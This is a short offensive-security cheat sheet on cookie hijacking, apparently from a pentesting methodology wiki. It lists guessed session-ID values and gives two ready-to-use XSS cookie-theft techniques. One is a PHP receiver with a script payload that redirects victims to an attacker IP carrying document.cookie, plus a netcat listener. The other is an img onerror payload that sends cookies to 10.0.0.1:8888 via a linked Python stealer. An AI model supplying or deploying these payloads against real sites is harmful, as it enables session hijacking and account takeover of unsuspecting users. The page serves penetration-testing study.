# Cookie Hijacking

A methodology of manipulating, grabbing cookies.

### Cookie Manipulation <a href="#cookie-manipulation" id="cookie-manipulation"></a>

```
Cookie: PHPSESSID=0
Cookie: PHPSESSID=1
Cookie: PHPSESSID=999

<!-- ASCII Hex -->
Cookie: PHPSESSID=3836382d61646d696e
```

### PHP Cookie Grabbing with XSS <a href="#php-cookie-grabbing-with-xss" id="php-cookie-grabbing-with-xss"></a>

In your local machine, create the payload for grabbing the cookie when the other user will access your machine.

```
// steal_cookie.php

<?php echo $_GET['cookie']; ?>
```

Create the JavaScript code to force users to access your machine which shows the victim's cookie value.

```
<script>document.location = 'http://<attacker-ip>:4444/steal_cookie.php?cookie='+document.cookie</script>
```

POST request with this JavaScript code to the target web page.\
Open listner in your local machine and wait for the other users will access the target web page.

```
nc -lvnp 4444
```

### Python Cookie Stealer with XSS <a href="#python-cookie-stealer-with-xss" id="python-cookie-stealer-with-xss"></a>

[This script](https://github.com/lnxg33k/misc/blob/master/XSS-cookie-stealer.py) is useful to steal Cookie.\
To start web server, execute the Python script as below.

```
python2 XSS-cookie-stealer.py
```

Then inject our XSS to steal Cookie via our web server.\
For instance,

```
<img src=x onerror=this.src='http://10.0.0.1:8888/?'+document.cookie;>
```